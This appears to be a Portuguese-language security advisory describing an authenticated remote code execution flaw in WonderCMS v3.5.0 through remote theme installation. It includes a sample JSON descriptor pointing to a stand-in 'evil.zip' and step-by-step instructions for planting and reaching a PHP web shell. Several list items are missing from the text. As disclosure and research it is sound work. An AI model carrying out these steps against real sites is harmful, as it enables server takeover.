
Existe uma vulnerabilidade de Execução Remota de Código (RCE) autenticada no WonderCMS v3.5.0.
O problema decorre de como a aplicação lida com instalações remotas de temas/módulos via descritores JSON. Quando um administrador envia um arquivo JSON remoto referenciando um arquivo ZIP, seu conteúdo é extraído para um diretório acessível via web (por exemplo, /themes/). Se o ZIP contiver um arquivo PHP, esse arquivo se torna acessível pela web e pode ser executado.
Esse comportamento introduz risco de RCE devido a:
Nota: A autenticação de administrador é necessária, mas as instalações padrão expõem a senha do administrador publicamente (na página inicial), usam login somente com senha e não impõem controles de autenticação fortes.
O WonderCMS aceitará e tentará instalar módulos/temas remotos se o descritor JSON enviado corresponder ao formato esperado wcms-modules.json. Um descritor que passe na verificação de formato (e aponte para um arquivo ZIP) será buscado e o conteúdo do arquivo será extraído para um diretório acessível via web (por exemplo, /themes/<nome>/) sem validação adicional dos tipos de arquivo.
Exemplo de descritor :
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Aviso: Não execute em sistemas de produção. Use apenas ambientes de teste autorizados.
Obtenha a senha do administrador na página inicial publicamente exposta de uma instalação padrão do WonderCMS.
Faça login no painel de administração.
Navegue até a seção de instalação de temas.
Forneça a URL de um descritor JSON malicioso (por exemplo, hospedado em um servidor controlado pelo atacante).
Inicie a instalação. O servidor irá:
Instale o tema malicioso baixado.
Acesse o shell PHP extraído (por exemplo, http://target.com/themes/<Theme_Name>/shell.php) para executar comandos arbitrários.
(Nota: Execute estas etapas somente em um ambiente de teste controlado. Explorar esta vulnerabilidade em sistemas ativos sem autorização é ilegal.)
A vulnerabilidade foi relatada aos mantenedores do WonderCMS em julho de 2025.
Os mantenedores reconheceram o relatório, mas observaram que, em sua visão, esse comportamento é aceitável para administradores.
Para reduzir a exposição:
themes/ ou plugins/ por meio da configuração do servidor.Esta informação é fornecida para fins educacionais e de pesquisa defensiva em segurança. Sempre obtenha autorização adequada antes de testar ou divulgar vulnerabilidades.